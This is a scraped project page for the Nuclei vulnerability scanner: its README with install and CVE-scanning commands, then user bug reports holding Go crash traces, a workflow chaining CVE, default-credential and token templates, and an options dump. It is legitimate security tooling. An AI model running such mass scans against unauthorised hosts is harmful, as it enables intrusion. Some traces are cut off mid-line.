Nuclei is a fast tool for configurable targeted vulnerability scanning based on templates offering massive extensibility and ease of use.

Last update: Dec 30, 2022

Comments: 17

Fast and customisable vulnerability scanner based on simple YAML based DSL.

How • Install • For Security Engineers • For Developers • Documentation • Credits • License • Join Discord

Nuclei is used to send requests across targets based on a template leading to zero false positives and providing fast scanning on large number of hosts. Nuclei offers scanning for a variety of protocols including TCP, DNS, HTTP, File, etc. With powerful and flexible templating, all kinds of security checks can be modelled with Nuclei.

We have a dedicated repository that houses various type of vulnerability templates contributed by more than 100 security researchers and engineers. It is preloaded with ready to use templates using -update-templates flag.

How it works

Install Nuclei

▶ GO111MODULE=on go get -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei

More installation methods can be found here.

Download Templates

You can download and update the nuclei templates using update-templates flag of nuclei that downloads all the available nuclei-templates from Github project, a community curated list of templates that are ready to use.

▶ nuclei -update-templates

Nuclei is designed to used with custom templates according to the target and workflow, you can write your own checks for your specific workflow and needs, please refer to nuclei templating guide to write your own custom templates.

Running Nuclei

Scanning for CVEs on given list of URLs.

▶ nuclei -l target_urls.txt -t cves/

More detailed examples of running nuclei can be found here.

For Security Engineers

Nuclei offers great number of features that are helpful for security engineers to customise workflow in their organisation. With the varieties of scan capabilities (like DNS, HTTP, TCP), security engineers can easily create their suite of custom checks with Nuclei.

Varieties of protocols supported: TCP, DNS, HTTP, File, etc
Achieve complex vulnerability steps with workflows and dynamic requests.
Easy to integrate into CI/CD, designed to be easily integrated into regression cycle to actively check the fix and re-appearance of vulnerability.

For bugbounty hunters:

Nuclei allows you to customise your testing approach with your own suite of checks and easily run across your bug bounty programs. Moroever, Nuclei can be easily integrated into any continuous scanning workflow.

Designed to be easily integrated into other tool workflow.
Can process thousands of hosts in few minutes.
Easily automate your custom testing approach with our simple YAML DSL.

Please check our other open-source projects that might fit into your bug bounty workflow: github.com/projectdiscovery, we also host daily refresh of DNS data at Chaos.

For pentesters:

Nuclei immensely improve how you approach security assessment by augmenting the manual repetitve processes. Consultancies are already converting their manual assessment steps with Nuclei, it allows them to run set of their custom assessment approach across thousands of hosts in an automated manner.

Pen-testers get the full power of our public templates and customization capabilities to speed-up their assessment process, and specifically with the regression cycle where you can easily verify the fix.

Easily create your compliance, standards suite (e.g. OWASP Top 10) checklist.
With capabilities like fuzz and workflows, complex manual steps and repetitive assessment can be easily automated with Nuclei.
Easy to re-test vulnerability-fix by just re-running the template.

For Developers and Organisations

Nuclei is built with simplicity in mind, with the community backed templates by hundreds of security researchers, it allows you to stay updated with latest security threats using continuous Nuclei scanning on the hosts. It is designed to be easily integrated into regression tests cycle, to verify the fixes and eliminate vulnerabilities from occuring in future.

CI/CD: Engineers are already utilising Nuclei within their CI/CD pipeline, it allows them to constantly monitor their staging and production environments with customised templates.
Continuous Regression Cycle: With Nuclei, you can create your custom template on every new identified vulnerability and put into Nuclei engine to eliminate in the continuous regression cycle.

We have a discussion thread around this, there are already some bug bounty programs giving incentives to hackers on writing nuclei templates with every submission, that helps them to eliminate the vulnerability across all their assets, as well as to eliminate future risk in reappearing on productions. If you're interested in implementing it in your organisation, feel free to reach out to us. We will be more than happy to help you in the getting started process, or you can also post into the discussion thread for any help.

Resources

Credits

Thanks to all the amazing community contributors for sending PRs. Do also check out the below similar open-source projects that may fit in your workflow:

FFuF, Qsfuzz, Inception, Snallygaster, Gofingerprint, Sn1per, Google tsunami, Jaeles, ChopChop

License

Nuclei is distributed under MIT License

Owner

ProjectDiscovery

Security Through Intelligent Automation

https://github.com/projectdiscovery/nuclei https://nuclei.projectdiscovery.io

Comments

[issue] runtime error

Describe the bug I updated my nuclei install to version 2.4.1 and now it errors out every time i try to run it. Be advised I think upgrade over brew install and i am running Darwin HQSML-1689616 19.6.0 Darwin Kernel Version 19.6.0: Thu Jun 18 20:49:00 PDT 2020; root:xnu-6153.141.1~1/RELEASE_X86_64 x86_64. This is related to #888

Nuclei version Please share the version of the nuclei you are running with nuclei -version See above and below

Screenshot of the error or bug please add the screenshot showing bug or issue you are facing.

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   2.4.1

		projectdiscovery.io

[ERR] Could not read nuclei-ignore file: open /Users/gbiago909/.config/nuclei/.nuclei-ignore: no such file or directory
[INF] Using Nuclei Engine 2.4.1
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x10 pc=0x49052fb]

goroutine 1 [running]:
github.com/projectdiscovery/nuclei/v2/internal/runner.(*Runner).RunEnumeration(0xc0000e6000, 0x0, 0x0)
	github.com/projectdiscovery/nuclei/v2/internal/runner/runner.go:345 +0xd5b
main.main()
	command-line-arguments/main.go:30 +0x87

Nuclei Crashes on a huge list of urls
Nuclei version:

2.7.7

Current Behavior:

When running nuclei on a list of targets more than 5K, it seems to crash after running for 10 minutes.

Expected Behavior:

It should not crash.

Steps To Reproduce:

nuclei -l urls.txt -t any.yaml -rl 40 -o any.txt

KILLED message appears after a while on bash.

Anything else:

signal SIGSEGV: segmentation violation code=0x1 addr=0x28 pc=0x1b6c1d6

Hi, I get this error using the latest version of Nuclei from MacBook Pro 2019

Nuclei Engine 2.8.1 (latest) Nuclei Templates 9.3.0 (latest)

[signal SIGSEGV: segmentation violation code=0x1 addr=0x28 pc=0x1b6c1d6]

goroutine 1481646 [running]:
github.com/projectdiscovery/nuclei/v2/pkg/input.(*Helper).convertInputToType(0xc0024b6028, {0xc00afe0d00, 0xc8}, 0x4, {0x0, 0x0})
	github.com/projectdiscovery/nuclei/v2/pkg/input/input.go:72 +0x96
github.com/projectdiscovery/nuclei/v2/pkg/input.(*Helper).Transform(0x1046973?, {0xc00afe0d00?, 0x8?}, 0x1304efd?)
	github.com/projectdiscovery/nuclei/v2/pkg/input/input.go:43 +0x7f
github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/executer.(*Executer).Execute(0xc0021b0d60, 0xc0033c2940)
	github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/executer/executer.go:75 +0x2c6
github.com/projectdiscovery/nuclei/v2/pkg/core.(*Engine).executeModelWithInput.func2.1(0x132a226?, 0x0?, 0xc0033c2800)
	github.com/projectdiscovery/nuclei/v2/pkg/core/execute.go:146 +0x182
created by github.com/projectdiscovery/nuclei/v2/pkg/core.(*En
	github.com/projectdiscovery/nuclei/v2/pkg/core/execute.go:131 +0x745

[issue] panic: runtime error: invalid memory address or nil pointer dereference

Describe the bug I was running a test to see if I could run most of the templates with a single call to a url. This is the custom workflow I ran by echoing in a single url to nuclei.

id: unguided
info:
  name: Workflow to run most of the templates
  author: Jeffrey Shran

variables:
  cves: cves/
  default_credentials: default-credentials/
  dns: dns/
  files: files/
  generic_detections: generic-detections/
  panels: panels/
  security_misconfiguration: security-misconfiguration/
  subdomain_takeover: subdomain-takeover/
  technologies: technologies/
  tokens: tokens/
  vulnerabilities: vulnerabilities/

logic:
  |
  cves()
  default_credentials()
  dns()
  files()
  generic_detections()
  panels()
  security_misconfiguration()
  subdomain_takeover()
  technologies()
  tokens()
  vulnerabilities()

The command I ran is as follows:

echo "https://example.com" | nuclei -c 200 -t ~/unguided.yaml -o example_com.nuclei.unguided

Nuclei runs for 30-45 seconds then produces the error in the screenshot below.

Nuclei version Current Version: 2.1.0

Screenshot of the error or bug

Nuclei stops to query additional paths when first path/URL is not reachable in case of ports
Hello,

I am not sure if I should not post this issue on the Nuclei github directly.

I am trying to perform a template which just match a file. The specificity here is that i add a check on another port :

- "{{BaseURL}}/myfile.txt" - "{{BaseURL}}:8080/myfile.txt"

(The text context is the following: The file is available on port 8080. Server don't answer on port 80, the base URL)

Problem is that this doesn't work, Nuclei seems to stop the check as the server is not responding :

[INF] [MyTemplate] Loaded template File Detection Template (@Ohlala) [info] [WRN] Could not execute step: could not make http request: GET http://###REDACTED#####/myfile.txt giving up after 2 attempts: Get "http://REDACTED/myfile.txt": dial tcp REDACTED:80: connect: connection refused

However, when using a proxy there is no problem and i got the match with the 8080 port.

Any idea ?

[bug] An error occurs when running nuclei with multiple instances

fatal error: concurrent map iteration and map write

test code:

package main

import (
	"bytes"
	"fmt"
	"github.com/hktalent/scan4all/nuclei_Yaml"
	"net/http"
	_ "net/http/pprof"
	"os"
	"sync"
)


func DoNuclei(buf *bytes.Buffer, wg *sync.WaitGroup, oOpts *map[string]interface{}) {
	defer wg.Done()
	xx := make(chan bool)
	go nuclei_Yaml.RunNuclei(buf, xx, nil)
	<-xx
}

func main() {
	if true {
		go func() {
			http.ListenAndServe(":6060", nil)
		}()
		buf := bytes.Buffer{}
		var wg sync.WaitGroup
		wg.Add(1)
		buf.WriteString("http://192.168.10.31:8888\n")
		pwd, _ := os.Getwd()
		m1 := map[string]interface{}{"UpdateTemplates": false, "Templates": []string{pwd + "/config/nuclei-templates"}, "TemplatesDirectory": pwd + "/config/nuclei-templates", "NoUpdateTemplates": true}
		go DoNuclei(&buf, &wg, &m1)
		wg.Add(1)
		go DoNuclei(&buf, &wg, &m1)
		wg.Add(1)
		go DoNuclei(&buf, &wg, &m1)
		wg.Wait()
	}
}

error:

[0:00:25] | Templates: 3661 | Hosts: 1 | RPS: 102 | Matched: 19 | Errors: 92 | Requests: 2574/5043 (51%)
fatal error: concurrent map iteration and map write

goroutine 36114 [running]:
runtime.throw({0x52c27f3?, 0x1?})
        /usr/local/Cellar/go/1.18.4/libexec/src/runtime/panic.go:992 +0x71 fp=0xc010f3f288 sp=0xc010f3f258 pc=0x4038b51
runtime.mapiternext(0x5031840?)
        /usr/local/Cellar/go/1.18.4/libexec/src/runtime/map.go:871 +0x4eb fp=0xc010f3f2f8 sp=0xc010f3f288 pc=0x4013aeb
github.com/projectdiscovery/nuclei/v2/pkg/protocols/http.(*Request).executeRequest(0xc00ebe1680, {0xc0007cac60, 0x19}, 0xc01385f540, 0xc008d9d680?, 0x0, 0xc008d9d6b0, 0x0?)
        /Users/51pwn/MyWork/scan4all/vendor/github.com/projectdiscovery/nuclei/v2/pkg/protocols/http/request.go:573 +0x28fb fp=0xc010f3ff38 sp=0xc010f3f2f8 pc=0x4d0f59b
github.com/projectdiscovery/nuclei/v2/pkg/protocols/http.(*Request).executeTurboHTTP.func1(0xc008412b40?)
        /Users/51pwn/MyWork/scan4all/vendor/github.com/projectdiscovery/nuclei/v2/pkg/protocols/http/request.go:210 +0x9f fp=0xc010f3ffc8 sp=0xc010f3ff38 pc=0x4d0bbdf
github.com/projectdiscovery/nuclei/v2/pkg/protocols/http.(*Request).executeTurboHTTP.func2()
        /Users/51pwn/MyWork/scan4all/vendor/github.com/projectdiscovery/nuclei/v2/pkg/protocols/http/request.go:216 +0x2a fp=0xc010f3ffe0 sp=0xc010f3ffc8 pc=0x4d0bb0a
runtime.goexit()
        /usr/local/Cellar/go/1.18.4/libexec/src/runtime/asm_amd64.s:1571 +0x1 fp=0xc010f3ffe8 sp=0xc010f3ffe0 pc=0x406b861
created by github.com/projectdiscovery/nuclei/v2/pkg/protocols/http.(*Request).executeTurboHTTP
        /Users/51pwn/MyWork/scan4all/vendor/github.com/projectdiscovery/nuclei/v2/pkg/protocols/http/request.go:207 +0x377

goroutine 1 [chan receive]:
main.DoNuclei(0xc00093bd40, 0xc000869e30?, 0x5280fd1?)
        /Users/51pwn/MyWork/scan4all/test/nuclei/testNuclei.go:29 +0xca
main.main()
        /Users/51pwn/MyWork/scan4all/test/nuclei/testNuclei.go:45 +0x2c5

log.txt

options

{
  "Tags": [],
  "ExcludeTags": [],
  "Workflows": [],
  "WorkflowURLs": [],
  "Templates": [
    "/Users/51pwn/MyWork/scan4all/config/nuclei-templates"
  ],
  "TemplateURLs": [],
  "RemoteTemplateDomainList": [
    "api.nuclei.sh"
  ],
  "ExcludedTemplates": [],
  "ExcludeMatchers": null,
  "CustomHeaders": [],
  "Vars": {},
  "Severities": null,
  "ExcludeSeverities": null,
  "Authors": [],
  "Protocols": [
    1,
    2,
    3,
    4,
    5,
    6,
    7,
    8,
    9
  ],
  "ExcludeProtocols": null,
  "IncludeTags": [],
  "IncludeTemplates": [],
  "IncludeIds": [],
  "ExcludeIds": [],
  "InternalResolversList": null,
  "ProjectPath": "/var/folders/_l/pnb2t_9s0f192bqlz1348vpr0000gn/T/",
  "InteractshURL": "",
  "InteractshToken": "",
  "Targets": [
    "http://192.168.10.31:8888"
  ],
  "TargetsFilePath": "",
  "Resume": "",
  "Output": "",
  "ProxyInternal": false,
  "Proxy": [],
  "TemplatesDirectory": "/Users/51pwn/MyWork/scan4all/config/nuclei-templates",
  "TraceLogFile": "",
  "ErrorLogFile": "",
  "ReportingDB": "",
  "ReportingConfig": "",
  "MarkdownExportDirectory": "",
  "SarifExport": "",
  "ResolversFile": "",
  "StatsInterval": 5,
  "MetricsPort": 9092,
  "MaxHostError": 30,
  "BulkSize": 64,
  "TemplateThreads": 64,
  "HeadlessBulkSize": 10,
  "HeadlessTemplateThreads": 10,
  "Timeout": 5,
  "Retries": 1,
  "RateLimit": 150,
  "RateLimitMinute": 0,
  "PageTimeout": 20,
  "InteractionsCacheSize": 5000,
  "InteractionsPollDuration": 5,
  "InteractionsEviction": 60,
  "InteractionsCoolDownPeriod": 5,
  "MaxRedirects": 10,
  "FollowRedirects": false,
  "OfflineHTTP": false,
  "StatsJSON": false,
  "Headless": false,
  "ShowBrowser": false,
  "UseInstalledChrome": false,
  "SystemResolvers": false,
  "Metrics": false,
  "Debug": false,
  "DebugRequests": false,
  "DebugResponse": false,
  "LeaveDefaultPorts": false,
  "AutomaticScan": false,
  "Silent": false,
  "Version": false,
  "Validate": false,
  "NoStrictSyntax": false,
  "Verbose": false,
  "VerboseVerbose": false,
  "NoColor": false,
  "UpdateTemplates": false,
  "JSON": false,
  "JSONRequests": false,
  "EnableProgressBar": true,
  "TemplatesVersion": false,
  "TemplateList": false,
  "HangMonitor": false,
  "Stdin": false,
  "StopAtFirstMatch": false,
  "Stream": false,
  "NoMeta": false,
  "NoTimestamp": false,
  "Project": false,
  "NewTemplates": false,
  "NewTemplatesWithVersion": null,
  "NoInteractsh": false,
  "UpdateNuclei": false,
  "NoUpdateTemplates": true,
  "EnvironmentVariables": false,
  "MatcherStatus": false,
  "ClientCertFile": "",
  "ClientKeyFile": "",
  "ClientCAFile": "",
  "ZTLS": false,
  "ShowMatchLine": false,
  "EnablePprof": false,
  "StoreResponse": false,
  "StoreResponseDir": "output",
  "DisableRedirects": true,
  "SNI": "",
  "HealthCheck": false,
  "InputReadTimeout": 0,
  "DisableStdin": false
}

Reporting to Github issues fails if the issue-label field is not set
Describe the bug For the following reporting configuration, nuclei fails to report with error 422 Validation Failed [{Resource:Label Field:name Code:missing_field Message:}]

allow-list: severity: info, low, medium, high, critical github: username: "0xcrypto" owner: "bb-research" token: "REDACTED" project-name: "hackberry_xyz"

Nuclei version v2.5.2

Screenshot of the error or bug
Headless Browsing Login on Websites not Working

Describe the bug Headless Browsing login flow on websites not working

Nuclei version Nuclei v 2.5.2

Screenshot of the error or bug Has anyone tried authenticating into a modern website via Nuclei headless browsing? I've been trying to log into Trello but the login flow which should lead me here after inputting my email(tested on regular browser):

in Nuclei headless seems to instead lead me back to this page:
[issue] Could not initialize interactsh client when running nuclei

Describe the bug My nuclei work well in version 2.5.0 however, when I updated to the new version 2.5.1, I got the error Could not initialize interactsh client: could not create client: could not make register request, how can I fixed this issue, my command when running nuclei is: nuclei -l urls.txt -t nuclei-templates/ -o output.txt

Nuclei version 2.5.1

Screenshot of the error or bug
Enumeration progressbar
This is an initial implementation for a progress tracking system that informs the user of the enumeration state by providing visual feedback via progress bars.

This is by no means a "pull-request" in the sense "please pull this into your repo else i'm mad", but this is meant to be here for tracking and discussion purposes, please feel free to make it to pieces :)

These changes provides the following:

a single progress bar when a single template is specified

this will track the total number of requests, for the specified template, for all the specified hosts

two progress bars when a template directory is specified

progress bar 1 will track the total number of requests, for all the specified templates, for all the specified hosts

progress bar 2 will track the total number of requests, for the current template, for all the specified hosts

There were some things to consider in doing this, so i had to make some choices in order to have an initial implementation working, i'll depict the main points here.

progress bar library

There are quite a bit of libraries for this, but to my understanding the best one is probably https://github.com/vbauerster/mpb, supporting multiple progress bars out-of-the-box.

enumeration support

Only HTTP requests support has been implemented, once this is good and stable i can start working on both the DNS requests and the Workflow integration.

stdout/stderr output

At this time, both stdout and stderr are buffered and they are both shown at the end of the enumeration phase.

Progress bars always write to stderr.

I've started working on this with the idea to provide the same original behavior, showing both during the enumeration process. This quite worked, but not all the times, especially when fast stdout is written to the screen, mangled output is not what you want in most cases.

-no-progressbar flag proposal

At this time there is no way to switch off the progress bar, but it may be sensible to let users choose to not have visual feedback at all and process stdout as usual instead: for this i propose to add a -no-progressbar flag to actually disable the visual progress feedback.

refactoring

In order to know the total number of hosts and requests per template beforehand, i had to refactor the code a bit: this may not be ideal or the "projectdiscovery" way, please let me know!

Loading thousands of urls in list file will lock the executing threads

goroutine 24336 [runnable, locked to thread]:
syscall.Syscall(0x7ffa22051ac0, 0x1, 0x2c0d4, 0x0, 0x0)
        C:/Program Files/Go/src/runtime/syscall_windows.go:483 +0xf4
syscall.Closesocket(0xc009a4b310)
        C:/Program Files/Go/src/syscall/zsyscall_windows.go:1343 +0x5c
internal/poll.(*FD).destroy(0xc014ba8c80)
        C:/Program Files/Go/src/internal/poll/fd_windows.go:373 +0x9a
internal/poll.(*FD).decref(0x2b7be2e0)
        C:/Program Files/Go/src/internal/poll/fd_mutex.go:213 +0x54
internal/poll.(*FD).Close(0xc014ba8c80)
        C:/Program Files/Go/src/internal/poll/fd_windows.go:395 +0x69
net.(*netFD).Close(0xc014ba8c80)
        C:/Program Files/Go/src/net/fd_posix.go:38 +0x38
net.(*conn).Close(0xc000689980)
        C:/Program Files/Go/src/net/net.go:207 +0x45
github.com/miekg/dns.(*Client).Exchange(0xc0006f9b30, 0xc003a39c00, {0xc010fe4d9
0, 0x19f0172})
        C:/Users/DELL i5/go/pkg/mod/github.com/miekg/[email protected]/client.go:170 +
0x131
github.com/projectdiscovery/retryabledns.(*Client).QueryMultiple(0xc00011c280, {
0xc0019f6dc0, 0x1a}, {0xc009a4b61c, 0x2, 0x50a697})
        C:/Users/DELL i5/go/pkg/mod/github.com/projectdiscovery/retryabledns@v1.
0.13/client.go:248 +0x593
github.com/projectdiscovery/retryabledns.(*Client).Resolve(...)
        C:/Users/DELL i5/go/pkg/mod/github.com/projectdiscovery/retryabledns@v1.
0.13/client.go:100
github.com/projectdiscovery/fastdialer/fastdialer.(*Dialer).GetDNSData(0xc000726
140, {0xc0019f6dc0, 0x1a})
        C:/Users/DELL i5/go/pkg/mod/github.com/projectdiscovery/[email protected].
15-0.20220127193345-f06b0fd54d47/fastdialer/dialer.go:326 +0x2d1
github.com/projectdiscovery/fastdialer/fastdialer.(*Dialer).dial(0xc000726140, {
0x1a2f8e8, 0xc003f9c540}, {0x1410156, 0x3}, {0xc0019f6dc0, 0x118}, 0x0, 0x0, 0x0
, ...)
        C:/Users/DELL i5/go/pkg/mod/github.com/projectdiscovery/[email protected].
15-0.20220127193345-f06b0fd54d47/fastdialer/dialer.go:160 +0x17a
github.com/projectdiscovery/fastdialer/fastdialer.(*Dialer).Dial(...)
        C:/Users/DELL i5/go/pkg/mod/github.com/projectdiscovery/[email protected].
15-0.20220127193345-f06b0fd54d47/fastdialer/dialer.go:101
net/http.(*Transport).dial(0xc003f9c540, {0x1a2f8e8, 0xc003f9c540}, {0x1410156,
0xc0068d7b60}, {0xc0019f6dc0, 0xc0068d7ad0})
        C:/Program Files/Go/src/net/http/transport.go:1166 +0xda
net/http.(*Transport).dialConn(0xc00007edc0, {0x1a2f8e8, 0xc003f9c540}, {{}, 0x0
, {0xc002f3f140, 0x5}, {0xc0019f6dc0, 0x1e}, 0x0})
        C:/Program Files/Go/src/net/http/transport.go:1604 +0x845
net/http.(*Transport).dialConnFor(0x1a17740, 0xc0058dcd10)
        C:/Program Files/Go/src/net/http/transport.go:1446 +0xb0
created by net/http.(*Transport).queueForDial
        C:/Program Files/Go/src/net/http/transport.go:1415 +0x3d7

goroutine 24337 [IO wait]:
internal/poll.runtime_pollWait(0xc86bf7b8, 0x77)
        C:/Program Files/Go/src/runtime/netpoll.go:303 +0x85
internal/poll.(*pollDesc).wait(0x43, 0xc009a57088, 0x0)
        C:/Program Files/Go/src/internal/poll/fd_poll_runtime.go:84 +0x32
internal/poll.execIO(0xc003c89768, 0x16591f0)
        C:/Program Files/Go/src/internal/poll/fd_windows.go:175 +0xe5
internal/poll.(*FD).Write(0xc003c89680, {0xc00aa0fc70, 0x42, 0x43})
        C:/Program Files/Go/src/internal/poll/fd_windows.go:637 +0x33b
net.(*netFD).Write(0xc003c89680, {0xc00aa0fc70, 0x12d00a0, 0x13c12a0})
        C:/Program Files/Go/src/net/fd_posix.go:74 +0x29
net.(*conn).Write(0xc019f61b08, {0xc00aa0fc70, 0xc09950b40001001c, 0xc009a571b8}
)
        C:/Program Files/Go/src/net/net.go:195 +0x45
github.com/miekg/dns.(*Conn).Write(0xc002e92d80, {0xc00aa0fc70, 0x42, 0x43})
        C:/Users/DELL i5/go/pkg/mod/github.com/miekg/[email protected]/client.go:379 +
0x115
github.com/miekg/dns.(*Conn).WriteMsg(0xc002e92d80, 0x1b1559330d)
        C:/Users/DELL i5/go/pkg/mod/github.com/miekg/[email protected]/client.go:368 +
0xe5
github.com/miekg/dns.(*Client).exchangeContext(0xc00011c380, {0x1a2f8b0, 0xc0000
2a0e0}, 0xc009a57548, 0xc002e92d80)
        C:/Users/DELL i5/go/pkg/mod/github.com/miekg/[email protected]/client.go:240 +
0x367
github.com/miekg/dns.(*Client).exchangeWithConnContext(0x0, {0x1a2f8b0, 0xc00002
a0e0}, 0x0, 0x0)
        C:/Users/DELL i5/go/pkg/mod/github.com/miekg/[email protected]/client.go:195 +
0x1dc
github.com/miekg/dns.(*Client).ExchangeWithConn(0xc00011c380, 0x1a2f8b0, 0xc0000
2a0e0)
        C:/Users/DELL i5/go/pkg/mod/github.com/miekg/[email protected]/client.go:190 +
0x30
github.com/miekg/dns.(*Client).Exchange(0xc0006f9b00, 0xc003a39cb0, {0xc01888bd2
0, 0x19f0172})
        C:/Users/DELL i5/go/pkg/mod/github.com/miekg/[email protected]/client.go:170 +
0x10e
github.com/projectdiscovery/retryabledns.(*Client).QueryMultiple(0xc00011c280, {
0xc0019f6e60, 0x1a}, {0xc009a5761c, 0x2, 0x50a697})
        C:/Users/DELL i5/go/pkg/mod/github.com/projectdiscovery/retryabledns@v1.
0.13/client.go:248 +0x593
github.com/projectdiscovery/retryabledns.(*Client).Resolve(...)
        C:/Users/DELL i5/go/pkg/mod/github.com/projectdiscovery/retryabledns@v1.
0.13/client.go:100
github.com/projectdiscovery/fastdialer/fastdialer.(*Dialer).GetDNSData(0xc000726
140, {0xc0019f6e60, 0x1a})
        C:/Users/DELL i5/go/pkg/mod/github.com/projectdiscovery/[email protected].
15-0.20220127193345-f06b0fd54d47/fastdialer/dialer.go:326 +0x2d1
github.com/projectdiscovery/fastdialer/fastdialer.(*Dialer).dial(0xc000726140, {
0x1a2f8e8, 0xc003f9c780}, {0x1410156, 0x3}, {0xc0019f6e60, 0x118}, 0x0, 0x0, 0x0
, ...)
        C:/Users/DELL i5/go/pkg/mod/github.com/projectdiscovery/[email protected].
15-0.20220127193345-f06b0fd54d47/fastdialer/dialer.go:160 +0x17a
github.com/projectdiscovery/fastdialer/fastdialer.(*Dialer).Dial(...)
        C:/Users/DELL i5/go/pkg/mod/github.com/projectdiscovery/[email protected].
15-0.20220127193345-f06b0fd54d47/fastdialer/dialer.go:101
net/http.(*Transport).dial(0xc003f9c780, {0x1a2f8e8, 0xc003f9c780}, {0x1410156,
0xc0068d7b60}, {0xc0019f6e60, 0xc0068d7ad0})
        C:/Program Files/Go/src/net/http/transport.go:1166 +0xda
net/http.(*Transport).dialConn(0xc00007edc0, {0x1a2f8e8, 0xc003f9c780}, {{}, 0x0
, {0xc00608c630, 0x5}, {0xc0019f6e60, 0x1e}, 0x0})
        C:/Program Files/Go/src/net/http/transport.go:1604 +0x845
net/http.(*Transport).dialConnFor(0x1a17740, 0xc0058dcdc0)
        C:/Program Files/Go/src/net/http/transport.go:1446 +0xb0
created by net/http.(*Transport).queueForDial
        C:/Program Files/Go/src/net/http/transport.go:1415 +0x3d7

goroutine 24368 [runnable, locked to thread]:
syscall.Syscall(0x7ffa22051ac0, 0x1, 0x2b0fc, 0x0, 0x0)
        C:/Program Files/Go/src/runtime/syscall_windows.go:483 +0xf4
syscall.Closesocket(0xc009a79310)
        C:/Program Files/Go/src/syscall/zsyscall_windows.go:1343 +0x5c
internal/poll.(*FD).destroy(0xc0157cc280)
        C:/Program Files/Go/src/internal/poll/fd_windows.go:373 +0x9a
internal/poll.(*FD).decref(0x2bb25c38)
        C:/Program Files/Go/src/internal/poll/fd_mutex.go:213 +0x54
internal/poll.(*FD).Close(0xc0157cc280)
        C:/Program Files/Go/src/internal/poll/fd_windows.go:395 +0x69
net.(*netFD).Close(0xc0157cc280)
        C:/Program Files/Go/src/net/fd_posix.go:38 +0x38
net.(*conn).Close(0xc000688c50)
        C:/Program Files/Go/src/net/net.go:207 +0x45
github.com/miekg/dns.(*Client).Exchange(0xc0006f9bc0, 0xc001799070, {0xc002b049d
0, 0x19f0172})
        C:/Users/DELL i5/go/pkg/mod/github.com/miekg/[email protected]/client.go:170 +
0x131
github.com/projectdiscovery/retryabledns.(*Client).QueryMultiple(0xc00011c280, {
0xc003822d20, 0x14}, {0xc009a7961c, 0x2, 0x50a697})
        C:/Users/DELL i5/go/pkg/mod/github.com/projectdiscovery/retryabledns@v1.
0.13/client.go:248 +0x593
github.com/projectdiscovery/retryabledns.(*Client).Resolve(...)
        C:/Users/DELL i5/go/pkg/mod/github.com/projectdiscovery/retryabledns@v1.
0.13/client.go:100
github.com/projectdiscovery/fastdialer/fastdialer.(*Dialer).GetDNSData(0xc000726
140, {0xc003822d20, 0x14})
        C:/Users/DELL i5/go/pkg/mod/github.com/projectdiscovery/[email protected].
15-0.20220127193345-f06b0fd54d47/fastdialer/dialer.go:326 +0x2d1
github.com/projectdiscovery/fastdialer/fastdialer.(*Dialer).dial(0xc000726140, {
0x1a2f8e8, 0xc003f09ce0}, {0x1410156, 0x3}, {0xc003822d20, 0x118}, 0x0, 0x0, 0x0
, ...)
        C:/Users/DELL i5/go/pkg/mod/github.com/projectdiscovery/[email protected].
15-0.20220127193345-f06b0fd54d47/fastdialer/dialer.go:160 +0x17a
github.com/projectdiscovery/fastdialer/fastdialer.(*Dialer).Dial(...)
        C:/Users/DELL i5/go/pkg/mod/github.com/projectdiscovery/[email protected].
15-0.20220127193345-f06b0fd54d47/fastdialer/dialer.go:101
net/http.(*Transport).dial(0xc003f09ce0, {0x1a2f8e8, 0xc003f09ce0}, {0x1410156,
0xc0068d1b60}, {0xc003822d20, 0xc0068d1ad0})
        C:/Program Files/Go/src/net/http/transport.go:1166 +0xda
net/http.(*Transport).dialConn(0xc00007edc0, {0x1a2f8e8, 0xc003f09ce0}, {{}, 0x0
, {0xc00551b6b0, 0x5}, {0xc003822d20, 0x18}, 0x0})
        C:/Program Files/Go/src/net/http/transport.go:1604 +0x845
net/http.(*Transport).dialConnFor(0x1a17740, 0xc005a191e0)
        C:/Program Files/Go/src/net/http/transport.go:1446 +0xb0
created by net/http.(*Transport).queueForDial
        C:/Program Files/Go/src/net/http/transport.go:1415 +0x3d7

goroutine 24353 [runnable, locked to thread]:
syscall.Syscall(0x7ffa22051ac0, 0x1, 0x2b2f4, 0x0, 0x0)
        C:/Program Files/Go/src/runtime/syscall_windows.go:483 +0xf4
syscall.Closesocket(0xc009a6b310)
        C:/Program Files/Go/src/syscall/zsyscall_windows.go
unc2.1(0x6e34ca, 0x0, {0xc0117563f0, 0xc018e7c210})
        C:/Users/DELL i5/go/pkg/mod/github.com/projectdiscovery/nuclei/[email protected]
/pkg/core/execute.go:142 +0x12b
created by github.com/projectdiscovery/nuclei/v2/pkg/core.(*Engine).executeModel
WithInput.func2
        C:/Users/DELL i5/go/pkg/mod/github.com/projectdiscovery/nuclei/[email protected]
/pkg/core/execute.go:129 +0x6d0

goroutine 81952 [select, 1 minutes]:
net/http.(*Transport).getConn(0xc00007edc0, 0xc0033bb640, {{}, 0x0, {0xc00270430
0, 0x5}, {0xc01a21e340, 0x20}, 0x0})
        C:/Program Files/Go/src/net/http/transport.go:1372 +0x5d2
net/http.(*Transport).roundTrip(0xc00007edc0, 0xc01877c900)
        C:/Program Files/Go/src/net/http/transport.go:581 +0x774
net/http.(*Transport).RoundTrip(0xc01877c900, 0x1a17120)
        C:/Program Files/Go/src/net/http/roundtrip.go:18 +0x19
net/http.send(0xc006065100, {0x1a17120, 0xc00007edc0}, {0x13cf400, 0x4d7801, 0x2
48bfc0})
        C:/Program Files/Go/src/net/http/client.go:252 +0x5d8
net/http.(*Client).send(0xc0004aab40, 0xc006065100, {0xc0106eafe8, 0x70a8bb, 0x2
48bfc0})
        C:/Program Files/Go/src/net/http/client.go:176 +0x9b
net/http.(*Client).do(0xc0004aab40, 0xc006065100)
        C:/Program Files/Go/src/net/http/client.go:725 +0x908
net/http.(*Client).Do(...)
        C:/Program Files/Go/src/net/http/client.go:593
github.com/projectdiscovery/retryablehttp-go.(*Client).Do(0xc0003443f0, 0xc01a1c
fa10)
        C:/Users/DELL i5/go/pkg/mod/github.com/projectdiscovery/retryablehttp-go
@v1.0.3-0.20220506110515-811d938bd26d/do.go:64 +0x34e
github.com/projectdiscovery/nuclei/v2/pkg/protocols/http.(*Request).executeReque
